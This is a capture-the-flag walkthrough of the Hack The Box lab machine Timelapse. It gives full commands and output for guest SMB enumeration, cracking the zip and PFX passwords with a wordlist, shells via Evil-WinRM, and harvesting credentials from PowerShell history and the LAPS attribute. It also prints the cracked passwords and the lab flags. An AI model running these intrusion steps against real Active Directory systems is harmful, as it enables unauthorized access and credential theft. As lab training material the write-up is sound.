About Timelapse
In this post, I’m writing a write-up for the machine Timelapse from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Timelapse is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.
Foothold
After doing a port scan with Nmap on the machine, we can discover 11 open network ports. After enumerating port 445/tcp, we can find some interesting information, starting with a password-protected zip file named winrm_backup.zip and documentation about LAPS. After cracking the password, we have access to a certificate with a private key.
User
After cracking the password of the PFX-file, we can extract the private key from the certificate and establish an Evil-WinRM session as the user legacyy. After doing some enumeration with WinPEAS we can find the password for the user account svc_deploy in the PowerShell History File ConsoleHost_history and perform a lateral movement to svc_deploy.
Root
In the SMB enumeration step, we have found some information about LAPS. We can assume that LAPS is active on the machine, and a backup is in place to the Active Directory. We can read the password from administrator by reading the attribute value ms-Mcs-AdmPwd from the machine DC01. With Evil-WinRM we can establish a session to this machine and read the root flag.
Machine Info
| Machine Name: | Timelapse |
| Difficulty: | Easy |
| Points: | 30 |
| Release Date: | 26 Mar 2022 |
| IP: | 10.10.11.152 |
| Creator: | d4rkpayl0ad |
Recon
As always we start the machine with a port scan with Nmap.
1
2
┌──(root💀kali)-[/home/kali/htb/machines/timelapse]
└─# nmap -sC -sV -oA ./nmap/timelapse 10.10.11.152
The results.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-20 15:14 EDT
Nmap scan report for 10.10.11.152
Host is up (0.025s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-21 03:14:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-05-21T03:14:36
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.62 seconds
Wow, we found 11 open network ports. That’s quite a large attack surface. The interesting ports are 53/tcp (DNS), 88/tcp (Kerberos), 389/tcp (LDAP) and 445/tcp (SMB). Let’s start enumerating those ports.
Enumeration
Enumerate SMB
Let’s start with port 445/tcp the SMB protocol with smbmap with the username Guest, this is a default user which is created on the installation of Windows. Most IT admins are disabling this user, but maybe we are lucky.
1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[/home/kali/htb/machines/timelapse]
└─# smbmap -H 10.10.11.152 -u Guest -p "" 2 ⨯
[+] IP: 10.10.11.152:445 Name: timelapse.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share
It’s our lucky day! We have a list of the SMB shares. We have READ ONLY access to the share Shares. We can establish a connection to this share with smbclient.
Intrusion
Anonymous SMB access
1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[/home/kali/htb/machines/timelapse]
└─# smbclient //10.10.11.152/Shares -U Guest
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
For a user-friendly way to investigate, we enable recursive on our SMB console session and download all the files in the share Shares to our machine.
1
2
3
4
5
6
7
8
9
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (20.7 KiloBytes/sec) (average 20.7 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (1178.0 KiloBytes/sec) (average 1042.4 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (755.4 KiloBytes/sec) (average 1009.7 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (2456.3 KiloBytes/sec) (average 1265.9 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (577.1 KiloBytes/sec) (average 1211.7 KiloBytes/sec)
smb: \>
Let’s start analyzing the files. We have to directories Dev and Helpdesk. The directory Dev contains a password-protected zip file, named winrm_backup.zip.
The directory Helpdesk contains documentation about LAPS, also known as Local Administrator Password Solution. This tool provides management of local administrator passwords of domain-joined machines and back-up those passwords to the Active Directory.
We start with cracking the password of the winrm_backup.zip file with fcrackzip.
1
2
3
4
5
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# fcrackzip winrm_backup.zip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip
PASSWORD FOUND!!!!: pw == supremelegacy
Crack the PFX-file
We have access to the PFX file legacyy_dev_auth.pfx. This file is a PKCS#12 file, and contains the SSL certificate (public key) with the corresponding private key. To access the private key, we need to decrypt the certificate. With crackpkcs12, we can try to crack the password and extract the private key.
First, we need to install crackpkcs12.
1
2
3
4
5
sudo git clone https://github.com/crackpkcs12/crackpkcs12
cd crackpkcs12
./configure
make
sudo make install
Now, we can start crackin.
1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[/home/…/machines/timelapse/crackpkcs12/src]
└─# ./crackpkcs12 -d /usr/share/wordlists/rockyou.txt -v /home/kali/htb/machines/timelapse/smb/Shares/Dev/legacyy_dev_auth.pfx
Dictionary attack - Starting 4 threads
Performance: 3232793 passwords [ 10900 passwords per second]
*********************************************************
Dictionary attack - Thread 4 - Password found: thuglegacy
*********************************************************
Now we have the password. We can start extracting the private key and the certificate from each other with openssl.
1
2
3
4
5
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# openssl pkcs12 -in ./legacyy_dev_auth.pfx -nocerts -out legacyy.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
Extract the certificate.
1
2
3
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# openssl pkcs12 -in ./legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.crt
Enter Import Password:
We got left with two files.
1
2
3
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# ls
legacyy.crt legacyy_dev_auth.pfx legacyy.key
As the name of the PFX certificate already mentions, we can use these files to establish a connection with Evil-WinRM to the machine. A username is not needed.
Shell as legacyy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[/home/…/timelapse/smb/Shares/Dev]
└─# evil-winrm -i 10.10.11.152 -c ./legacyy.crt -k legacyy.key --ssl
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby2.7: no such file or directory
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
We can now read the user.txt.
1
2
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ../Desktop/user.txt
6a49a264e3820be0ebcef0b039687432
There are two another user accounts listed on this machine svc_deploy and TRX. We need to do a lateral move to one of these user accounts.
Lateral Movement
Move from legacyy to svc_deploy
Let’s start with doing some enumeration. Since this is a Windows machine we use WinPEAS.
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\legacyy\Documents> ./winPEASx64.exe
...
[+] Searching known files that can contain creds in home
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
C:\Users\legacyy\NTUSER.DAT
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
WinPEAS finds the file ConsoleHost_history.txt interessting, and so do I. Let’s check the contents.
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\Documents>
The contents is interessting, we can now lateral move ourselves to svc_deploy with Evil-WinRM.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[/home/…/htb/machines/timelapse/http]
└─# evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' --ssl
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby2.7: no such file or directory
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Privilege Escalation
Own Timelapse
The last part is the easiest one. LAPS is saving the password for the local administrator account in the Active Directory on the machine object in the attribute ms-Mcs-AdmPwd.
1
2
3
4
5
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> get-adcomputer dc01 -properties * | select ms-Mcs-AdmPwd
ms-Mcs-AdmPwd
-------------
75715dQ$XUS9u9PW]5mk;]j+
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!
Happy Hacking :-)